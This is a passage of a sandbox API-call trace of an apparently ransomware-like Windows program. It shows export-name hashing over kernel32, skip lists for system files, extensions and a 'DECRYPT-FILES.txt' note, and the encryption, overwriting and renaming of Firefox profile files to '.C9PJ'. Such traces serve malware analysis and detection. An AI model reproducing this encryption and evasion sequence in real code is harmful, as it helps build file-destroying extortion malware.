returned="EnableThreadProfiling" [0082.029] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.029] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.029] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.029] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.030] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.030] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.030] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.030] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.030] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.030] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.030] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.030] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.030] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.030] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.030] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.030] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.030] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 96 [0082.030] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.C9PJ") returned 101 [0082.030] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.C9PJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.c9pj"), dwFlags=0x0) returned 1 [0082.031] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.031] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.031] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.032] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6fa8c70, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0x0, dwReserved1=0x0, cFileName="search.json", cAlternateFileName="SEARCH~1.JSO")) returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="DECRYPT-FILES.txt") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="autorun.inf") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="boot.ini") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="desktop.ini") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="ntuser.dat") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="iconcache.db") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="bootsect.bak") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="ntuser.dat.log") returned 1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="thumbs.db") returned -1 [0082.032] lstrcmpiW (lpString1="search.json", lpString2="Bootfont.bin") returned 1 [0082.032] lstrlenW (lpString="search.json") returned 11 [0082.032] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0082.032] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0082.032] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0082.032] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0082.032] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.032] lstrlenW (lpString="search.json") returned 11 [0082.032] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" [0082.032] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.033] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=16771) returned 1 [0082.033] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.033] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.034] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.034] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.034] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.035] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.036] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.036] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.036] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.037] CloseHandle (hObject=0x464) returned 1 [0082.037] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.037] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.038] CloseHandle (hObject=0x0) returned 0 [0082.038] CloseHandle (hObject=0x460) returned 1 [0082.038] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.038] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.038] GetTickCount () returned 0x114cfce [0082.038] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.039] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.039] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.039] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.039] lstrlenA (lpString="kernel32.dll") returned 12 [0082.039] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.039] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.039] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.039] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.039] lstrlenA (lpString="ADDATOMA") returned 8 [0082.039] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.040] lstrlenA (lpString="ADDATOMW") returned 8 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.040] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.040] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.040] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.040] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.040] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.040] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.040] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.040] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.040] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.040] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.040] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.040] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.040] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.040] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.040] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.040] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.040] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.040] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.041] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.041] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.041] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.041] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.041] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.041] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.041] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.041] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.041] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.041] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.041] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.041] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.041] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.041] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.041] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.041] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.041] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.041] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.041] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.041] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.042] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.042] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.042] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.042] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.042] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.042] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.042] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.042] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.042] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.042] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.042] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.042] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.042] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.042] lstrlenA (lpString="BEEP") returned 4 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.042] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.042] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.042] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.042] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.042] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.043] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.043] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.043] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.043] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.043] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.043] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.043] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.043] lstrlenA (lpString="CANCELIO") returned 8 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.043] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.043] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.043] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, 